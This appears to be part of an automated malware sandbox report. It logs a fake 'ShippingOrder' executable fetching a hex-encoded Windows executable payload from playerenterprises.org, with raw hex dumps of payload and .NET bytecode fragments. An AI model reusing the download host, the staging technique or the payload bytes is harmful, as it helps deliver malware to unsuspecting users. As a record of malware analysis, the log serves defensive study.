                                                            2024-04-20 04:47:56 UTC16384INData Raw: 30 78 46 46 2c 20 30 78 37 45 2c 20 30 78 32 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 31 31 2c 20 30 78 30 33 2c 20 30 78 37 42 2c 20 30 78 33 32 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 31 31 2c 20 30 78 30 38 2c 20 30 78 31 45 2c 20 30 78 35 38 2c 20 30 78 31 32 2c 20 30 78 30 39 2c 20 30 78 31 41 2c 20 30 78 31 32 2c 20 30 78 30 31 2c 20 30 78 36 46 2c 20 30 78 34 36 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 36 2c 20 30 78 31 36 2c 20 30 78 46 45 2c 20 30 78 30 31 2c 20 30 78 31 33 2c 20 30 78 31 31 2c 20 30 78 32 30 2c 20 30 78 30 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 39 38 2c 20 30 78 46 41 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 37
                                                            Data Ascii: 0xFF, 0x7E, 0x2E, 0x00, 0x00, 0x04, 0x11, 0x03, 0x7B, 0x32, 0x00, 0x00, 0x04, 0x11, 0x08, 0x1E, 0x58, 0x12, 0x09, 0x1A, 0x12, 0x01, 0x6F, 0x46, 0x00, 0x00, 0x06, 0x16, 0xFE, 0x01, 0x13, 0x11, 0x20, 0x0C, 0x00, 0x00, 0x00, 0x38, 0x98, 0xFA, 0xFF, 0xFF, 0x7
                                                            2024-04-20 04:47:56 UTC16384INData Raw: 2c 20 30 78 30 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 38 37 2c 20 30 78 46 41 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 37 45 2c 20 30 78 32 32 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 37 45 2c 20 30 78 31 36 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 32 38 2c 20 30 78 30 35 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 42 2c 20 30 78 38 30 2c 20 30 78 32 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 32 30 2c 20 30 78 30 39 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 36 35 2c 20 30 78 46 41 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30
                                                            Data Ascii: , 0x0E, 0x00, 0x00, 0x38, 0x87, 0xFA, 0xFF, 0xFF, 0x7E, 0x22, 0x00, 0x00, 0x04, 0x7E, 0x16, 0x00, 0x00, 0x04, 0x28, 0x05, 0x00, 0x00, 0x2B, 0x80, 0x2C, 0x00, 0x00, 0x04, 0x20, 0x09, 0x00, 0x00, 0x00, 0xFE, 0x0E, 0x00, 0x00, 0x38, 0x65, 0xFA, 0xFF, 0xFF, 0
                                                            2024-04-20 04:47:56 UTC16384INData Raw: 30 30 2c 20 30 78 30 41 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 31 36 2c 20 30 78 33 41 2c 20 30 78 31 34 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 36 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 30 39 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 44 35 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 34 35 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 35 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c
                                                            Data Ascii: 00, 0x0A, 0x20, 0x00, 0x00, 0x00, 0x00, 0x16, 0x3A, 0x14, 0x00, 0x00, 0x00, 0x26, 0x20, 0x00, 0x00, 0x00, 0x00, 0x38, 0x09, 0x00, 0x00, 0x00, 0x38, 0xD5, 0xFF, 0xFF, 0xFF, 0xFE, 0x0C, 0x00, 0x00, 0x45, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x38,
                                                            2024-04-20 04:47:56 UTC16384INData Raw: 30 78 31 31 2c 20 30 78 30 36 2c 20 30 78 31 45 2c 20 30 78 36 32 2c 20 30 78 31 33 2c 20 30 78 30 36 2c 20 30 78 31 31 2c 20 30 78 30 36 2c 20 30 78 30 35 2c 20 30 78 30 35 2c 20 30 78 38 45 2c 20 30 78 36 39 2c 20 30 78 31 37 2c 20 30 78 31 31 2c 20 30 78 30 44 2c 20 30 78 35 38 2c 20 30 78 35 39 2c 20 30 78 39 31 2c 20 30 78 36 30 2c 20 30 78 31 33 2c 20 30 78 30 36 2c 20 30 78 31 31 2c 20 30 78 30 44 2c 20 30 78 31 37 2c 20 30 78 35 38 2c 20 30 78 31 33 2c 20 30 78 30 44 2c 20 30 78 31 31 2c 20 30 78 30 44 2c 20 30 78 30 36 2c 20 30 78 33 46 2c 20 30 78 44 35 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 33 38 2c 20 30 78 32 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 31 31 2c 20 30 78 30 34 2c 20 30 78 31
                                                            Data Ascii: 0x11, 0x06, 0x1E, 0x62, 0x13, 0x06, 0x11, 0x06, 0x05, 0x05, 0x8E, 0x69, 0x17, 0x11, 0x0D, 0x58, 0x59, 0x91, 0x60, 0x13, 0x06, 0x11, 0x0D, 0x17, 0x58, 0x13, 0x0D, 0x11, 0x0D, 0x06, 0x3F, 0xD5, 0xFF, 0xFF, 0xFF, 0x38, 0x2E, 0x00, 0x00, 0x00, 0x11, 0x04, 0x1
                                                            2024-04-20 04:47:56 UTC16384INData Raw: 2c 20 30 78 33 38 2c 20 30 78 41 39 2c 20 30 78 46 45 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 32 30 2c 20 30 78 31 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 43 44 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 36 2c 20 30 78 33 41 2c 20 30 78 42 37 2c 20 30 78 46 42 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 32 36 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 41 43 2c 20 30 78 46 42 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 31 31 2c 20 30 78 30 36 2c 20 30 78 31 36 2c 20 30 78 38 44 2c 20 30 78 31 44 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 31 2c 20 30 78 31 36 2c 20 30 78 31 36 2c 20 30 78 32 38 2c 20 30
                                                            Data Ascii: , 0x38, 0xA9, 0xFE, 0xFF, 0xFF, 0x20, 0x10, 0x00, 0x00, 0x00, 0x28, 0xCD, 0x00, 0x00, 0x06, 0x3A, 0xB7, 0xFB, 0xFF, 0xFF, 0x26, 0x20, 0x00, 0x00, 0x00, 0x00, 0x38, 0xAC, 0xFB, 0xFF, 0xFF, 0x11, 0x06, 0x16, 0x8D, 0x1D, 0x00, 0x00, 0x01, 0x16, 0x16, 0x28, 0
                                                            2024-04-20 04:47:56 UTC16384INData Raw: 32 30 2c 20 30 78 39 36 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 33 32 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 35 39 2c 20 30 78 39 43 2c 20 30 78 32 30 2c 20 30 78 32 37 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 34 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 35 38 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 31 37 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 31 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 31 37 2c 20 30 78 30 30 2c 20 30 78 39 43 2c 20 30 78 46 45 2c 20 30 78 30 43 2c
                                                            Data Ascii: 20, 0x96, 0x00, 0x00, 0x00, 0x20, 0x32, 0x00, 0x00, 0x00, 0x59, 0x9C, 0x20, 0x27, 0x00, 0x00, 0x00, 0x20, 0x4C, 0x00, 0x00, 0x00, 0x58, 0xFE, 0x0E, 0x17, 0x00, 0xFE, 0x0C, 0x20, 0x00, 0x20, 0x11, 0x00, 0x00, 0x00, 0xFE, 0x0C, 0x17, 0x00, 0x9C, 0xFE, 0x0C,
                                                            2024-04-20 04:47:56 UTC16384INData Raw: 30 78 30 39 2c 20 30 78 30 30 2c 20 30 78 39 43 2c 20 30 78 32 30 2c 20 30 78 32 33 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 35 38 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 31 41 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 31 33 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 42 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 31 41 2c 20 30 78 30 30 2c 20 30 78 39 43 2c 20 30 78 32 30 2c 20 30 78 37 42 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 32 39 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 35
                                                            Data Ascii: 0x09, 0x00, 0x9C, 0x20, 0x23, 0x00, 0x00, 0x00, 0x20, 0x41, 0x00, 0x00, 0x00, 0x58, 0xFE, 0x0E, 0x1A, 0x00, 0xFE, 0x0C, 0x13, 0x00, 0x20, 0x0B, 0x00, 0x00, 0x00, 0xFE, 0x0C, 0x1A, 0x00, 0x9C, 0x20, 0x7B, 0x00, 0x00, 0x00, 0x20, 0x29, 0x00, 0x00, 0x00, 0x5
                                                            2024-04-20 04:47:56 UTC16384INData Raw: 2c 20 30 78 32 37 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 34 34 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 31 31 2c 20 30 78 32 33 2c 20 30 78 37 45 2c 20 30 78 34 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 36 46 2c 20 30 78 34 44 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 33 38 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 31 31 2c 20 30 78 32 33 2c 20 30 78 37 45 2c 20 30 78 34 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 36 46 2c 20 30 78 34 44 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30
                                                            Data Ascii: , 0x27, 0x00, 0x00, 0x00, 0x38, 0x00, 0x00, 0x00, 0x38, 0x44, 0x00, 0x00, 0x00, 0x11, 0x23, 0x7E, 0x4C, 0x00, 0x00, 0x0A, 0x6F, 0x4D, 0x00, 0x00, 0x0A, 0x38, 0x41, 0x00, 0x00, 0x00, 0x11, 0x23, 0x7E, 0x4E, 0x00, 0x00, 0x0A, 0x6F, 0x4D, 0x00, 0x00, 0x0A, 0
                                                            2024-04-20 04:47:56 UTC16384INData Raw: 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 32 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 39 44 2c 20 30 78 46 36 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 42 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 38 46 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 32 46 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 35 39 2c 20 30 78 39 43 2c 20 30 78 32 30 2c 20 30 78 34 37 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 38 32 2c 20 30 78 46 36 2c 20 30 78 46 46 2c 20 30 78 46 46 2c
                                                            Data Ascii: 00, 0x00, 0x00, 0xFE, 0x0E, 0x02, 0x00, 0x38, 0x9D, 0xF6, 0xFF, 0xFF, 0xFE, 0x0C, 0x0B, 0x00, 0x20, 0x01, 0x00, 0x00, 0x00, 0x20, 0x8F, 0x00, 0x00, 0x00, 0x20, 0x2F, 0x00, 0x00, 0x00, 0x59, 0x9C, 0x20, 0x47, 0x01, 0x00, 0x00, 0x38, 0x82, 0xF6, 0xFF, 0xFF,


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449731193.222.96.1474436424C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-20 04:47:57 UTC87OUTGET /BaseVirtualEnvironment/6621c520c9ebd.txt HTTP/1.1
                                                            Host: playerenterprises.org
                                                            2024-04-20 04:47:58 UTC258INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Sat, 20 Apr 2024 04:47:58 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 1440766
                                                            Last-Modified: Fri, 19 Apr 2024 01:13:04 GMT
                                                            Connection: close
                                                            ETag: "6621c520-15fbfe"
                                                            X-Powered-By: PleskLin
                                                            Accept-Ranges: bytes
                                                            2024-04-20 04:47:58 UTC16126INData Raw: 30 78 34 44 2c 20 30 78 35 41 2c 20 30 78 39 30 2c 20 30 78 30 30 2c 20 30 78 30 33 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 42 38 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 34 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30
                                                            Data Ascii: 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0
                                                            2024-04-20 04:47:58 UTC16384INData Raw: 2c 20 30 78 37 44 2c 20 30 78 41 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 32 41 2c 20 30 78 31 45 2c 20 30 78 30 32 2c 20 30 78 37 42 2c 20 30 78 41 44 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 32 41 2c 20 30 78 32 32 2c 20 30 78 30 32 2c 20 30 78 30 33 2c 20 30 78 37 44 2c 20 30 78 41 44 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 32 41 2c 20 30 78 31 45 2c 20 30 78 30 32 2c 20 30 78 37 42 2c 20 30 78 41 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 32 41 2c 20 30 78 32 32 2c 20 30 78 30 32 2c 20 30 78 30 33 2c 20 30 78 37 44 2c 20 30 78 41 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 32 41 2c 20 30 78 34 41 2c 20 30 78 30 32 2c 20 30
                                                            Data Ascii: , 0x7D, 0xAC, 0x00, 0x00, 0x04, 0x2A, 0x1E, 0x02, 0x7B, 0xAD, 0x00, 0x00, 0x04, 0x2A, 0x22, 0x02, 0x03, 0x7D, 0xAD, 0x00, 0x00, 0x04, 0x2A, 0x1E, 0x02, 0x7B, 0xAE, 0x00, 0x00, 0x04, 0x2A, 0x22, 0x02, 0x03, 0x7D, 0xAE, 0x00, 0x00, 0x04, 0x2A, 0x4A, 0x02, 0
                                                            2024-04-20 04:47:58 UTC16384INData Raw: 30 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 35 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 38 44 2c 20 30 78 33 35 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 31 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 41 32 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 31 34 2c
                                                            Data Ascii: 0C, 0x00, 0x00, 0x20, 0x05, 0x00, 0x00, 0x00, 0x8D, 0x35, 0x00, 0x00, 0x01, 0xFE, 0x0E, 0x01, 0x00, 0xFE, 0x0C, 0x01, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x72, 0x73, 0x00, 0x00, 0x70, 0xA2, 0xFE, 0x0C, 0x01, 0x00, 0x20, 0x01, 0x00, 0x00, 0x00, 0x28, 0x14,
                                                            2024-04-20 04:47:58 UTC16384INData Raw: 30 78 30 38 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 31 2c 20 30 78 33 39 2c 20 30 78 31 33 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 46 46 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 36 2c 20 30 78 38 30 2c 20 30 78 30 34 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 32 30 2c 20 30 78 30 32 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30
                                                            Data Ascii: 0x08, 0x00, 0x00, 0x00, 0xFE, 0x0E, 0x00, 0x00, 0x00, 0xFE, 0x0C, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x39, 0x13, 0x00, 0x00, 0x00, 0x28, 0xFF, 0x01, 0x00, 0x06, 0x80, 0x04, 0x00, 0x00, 0x04, 0x20, 0x02, 0x00, 0x00, 0x00, 0xFE, 0x0E, 0x0
                                                            2024-04-20 04:47:58 UTC16384INData Raw: 2c 20 30 78 46 45 2c 20 30 78 30 31 2c 20 30 78 33 39 2c 20 30 78 32 33 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 39 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 37 43 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 32 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 32 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 42 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 35 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 33 2c 20 30 78 30 30 2c 20 30
                                                            Data Ascii: , 0xFE, 0x01, 0x39, 0x23, 0x00, 0x00, 0x00, 0xFE, 0x09, 0x00, 0x00, 0x7C, 0x63, 0x00, 0x00, 0x04, 0xFE, 0x0C, 0x02, 0x00, 0xFE, 0x0C, 0x01, 0x00, 0x28, 0x02, 0x00, 0x00, 0x2B, 0xFE, 0x0E, 0x00, 0x00, 0x20, 0x05, 0x00, 0x00, 0x00, 0xFE, 0x0E, 0x03, 0x00, 0
                                                            2024-04-20 04:47:58 UTC16384INData Raw: 32 30 2c 20 30 78 30 34 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 31 2c 20 30 78 33 39 2c 20 30 78 30 35 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 30 35 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 33 38 2c 20 30 78 35 32 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 32 41 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 31 33 2c 20 30 78 33 30 2c 20 30 78 30 32 2c 20 30 78 30 30 2c 20 30 78 42 44 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 31 31 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c
                                                            Data Ascii: 20, 0x04, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x39, 0x05, 0x00, 0x00, 0x00, 0x38, 0x05, 0x00, 0x00, 0x00, 0x38, 0x52, 0xFF, 0xFF, 0xFF, 0x2A, 0x00, 0x00, 0x00, 0x13, 0x30, 0x02, 0x00, 0xBD, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x11, 0x20, 0x00, 0x00, 0x00, 0x00,
                                                            2024-04-20 04:47:58 UTC16384INData Raw: 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 39 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 35 2c 20 30 78 37 42 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 37 32 2c 20 30 78 41 45 2c 20 30 78 30 34 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 32 38 2c 20 30 78 31 42 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 37 44 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 32 30 2c 20 30 78 32 36 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32
                                                            Data Ascii: 0x00, 0x00, 0x00, 0xFE, 0x09, 0x00, 0x00, 0x25, 0x7B, 0x74, 0x00, 0x00, 0x04, 0x72, 0xAE, 0x04, 0x00, 0x70, 0x28, 0x1B, 0x00, 0x00, 0x0A, 0x7D, 0x74, 0x00, 0x00, 0x04, 0x20, 0x26, 0x00, 0x00, 0x00, 0xFE, 0x0E, 0x00, 0x00, 0x00, 0xFE, 0x0C, 0x00, 0x00, 0x2
                                                            2024-04-20 04:47:58 UTC16384INData Raw: 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 33 41 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 31 2c 20 30 78 33 39 2c 20 30 78 32 32 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 39 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 35 2c 20 30 78 37 42 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 37 32 2c 20 30 78 44 34 2c 20 30 78 30 35 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 32 38 2c 20 30 78 31 42 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30
                                                            Data Ascii: , 0x00, 0x00, 0xFE, 0x0E, 0x00, 0x00, 0x00, 0xFE, 0x0C, 0x00, 0x00, 0x20, 0x3A, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x39, 0x22, 0x00, 0x00, 0x00, 0xFE, 0x09, 0x00, 0x00, 0x25, 0x7B, 0x74, 0x00, 0x00, 0x04, 0x72, 0xD4, 0x05, 0x00, 0x70, 0x28, 0x1B, 0x00, 0x00, 0
                                                            2024-04-20 04:47:58 UTC16384INData Raw: 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 33 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 31 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 31 2c 20 30 78 33 39 2c 20 30 78 31 36 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 39 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 37 42 2c 20 30 78 37 46 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 32 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 45 2c 20 30 78 30 33 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 45 2c 20 30 78 30 43 2c 20 30 78 30 33 2c
